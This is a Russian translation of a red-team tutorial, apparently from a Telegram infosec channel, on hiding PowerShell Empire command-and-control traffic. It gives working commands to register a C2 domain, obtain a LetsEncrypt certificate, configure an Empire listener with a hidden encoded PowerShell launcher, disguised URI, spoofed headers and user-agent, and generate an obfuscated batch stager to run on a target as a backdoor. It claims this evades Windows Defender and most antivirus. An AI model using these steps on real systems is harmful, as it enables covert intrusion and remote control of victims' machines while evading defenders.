Перевод: Руководство RED TEAM - #2

Перевод: Руководство RED TEAM - #2

@Ent_TranslateIB

Шифрование трафика Empire

Темы:

  1. Регистрация домена
  2. Letsencrypt
  3. Empire Magic

ПРОЙДИТЕ ЛИШНЮЮ МИЛЮ

Перестаньте лениться. Перестаньте использовать стандартные опции, которые поставляются с вашими любимыми инструментами взлома. Чтобы избежать обнаружения, нужно играть по-умному. Потому что, хотите верьте, хотите нет, но специалисты (или: " Blue Teamers") становятся умнее с каждым днем.

В этом руководстве я не только расскажу о (правильном) использовании SSL, но и покажу вам некоторые параметры, которые нужно изменить, чтобы избежать обнаружения. Параметры, которые я установил, ни в коем случае не являются окончательными, а просто показывают, что параметры по умолчанию легко обнаруживаются. Так что пройдите лишнюю милю!

Я полагаю, что вы уже знаете, как настроить слушателя Empire. Если для вас это в новинку, сначала пройдите это руководство, чтобы познакомиться с PowerShell Empire.

1. Регистрация домена

Во-первых, зарегистрируйте домен для вашего сервера C2 или создайте поддомен на существующем домене. Это не только обязательный шаг для получения действительного SSL-сертификата, но и возможность перенести инфраструктуру C2 в другую хостинговую компанию или на другой IP-адрес. Всего одно обновление DNS позволит всем вашим бэкдорам найти ваш C2-сервер.

2. Используйте LetsEncrypt для создания SSL-сертификата

Чтобы избежать обнаружения из-за отпечатков SSL-сертификатов, вы должны создавать свои собственные пользовательские SSL-сертификаты. К счастью, именно здесь на помощь приходит LetsEncrypt. Некоммерческий центр сертификации, предоставляющий сертификаты TLS 260 миллионам веб-сайтов бесплатно (!).

  • Переходим на certbot.eff.org
  • Для программного обеспечения не выбирайте ничего из вышеперечисленного
  • Для системы, выберите свою операционную систему. В моем случае: Ubuntu 20.04
  • Следуйте инструкциям по установке Certbot на вашем сервере C2
  • Затем запросите сертификат, используя опцию --standalone:
    # certbot certonly --standalone -d YOURDOMAINHERE
  • Если все прошло нормально, ваш сертификат должен находиться в этом каталоге: /etc/letsencrypt/live/YOURDOMAINHERE

Чтобы подготовить этот совершенно новый сертификат для Empire, выполните следующие несколько простых шагов:

  • Создайте каталог для сохранения нового сертификата в:
    # mkdir /opt/ssl
  • Символическая ссылка Letsencrypt's fullchain на новый каталог, но с использованием соглашения об именовании Empire:
    # ln -s /etc/letsencrypt/live/YOURDOMAINHERE/fullchain.pem /opt/ssl/empire-chain.pem
  • Символическая ссылка LetsEncrypt privkey на новый каталог, снова используя соглашение об именовании Empire:
    # ln -s /etc/letsencrypt/live/YOURDOMAINHERE/privkey.pem /opt/ssl/empire-priv.key

Вы можете повысить свой OpSec, используя Cloudflare вместо LetsEncrypt. Недостатком является то, что вы можете использовать только WEB-порты для своих C2-соединений, поскольку Cloudflare перенаправляет WEB-трафик только на ваш IP-адрес.

3. Empire Magic

Пока никаких проблем? Хорошо! Давайте продолжим...

Использование надлежащего SSL-сертификата - не единственное, что вам понадобится, чтобы обойти специалистов. Ниже вы увидите, как я изменяю некоторые параметры по умолчанию, чтобы ограничить риск срабатывания любых правил обнаружения. Запустите Empire и выполните следующие команды:

listeners
uselistener http
set Name http
set Host https://YOURDOMAINHERE:443
set Port 443
set Launcher powershell.exe -nop -w hidden -e
set DefaultProfile /wp_includes/microsoft.php|Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36|Accept:*/*
set CertPath /opt/ssl/
set Headers Server:cloudflare
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
execute

После этого установите stager:

listeners
usestager windows/launcher_bat
set Listener http
set Obfuscate True
set ObfuscateCommand Token\String\1,1,2,1, Token\Variable\1
set UserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
set AMSIBypass False
execute

Если вы установите опцию OutFile, вывод будет осуществляться в указанном имени файла (по умолчанию: /tmp/launcher.bat). Просто скопируйте этот файл (или его содержимое) на свою цель и дважды щелкните, чтобы запустить свой бэкдор.

Вот и все! Это должно обойти Windows Defender и большинство антивирусных программ. Хорошая работа!


Перевод статьи был выполнен проектом перевод энтузиаста:

  • 📚 @Ent_TranslateIB - Телеграмм канал с тематикой информационной безопасности
  • 🔥 @Ent_Translate - Инстаграм проекта
Report content on this page

Report Page

Please submit your DMCA takedown request to dmca@telegram.org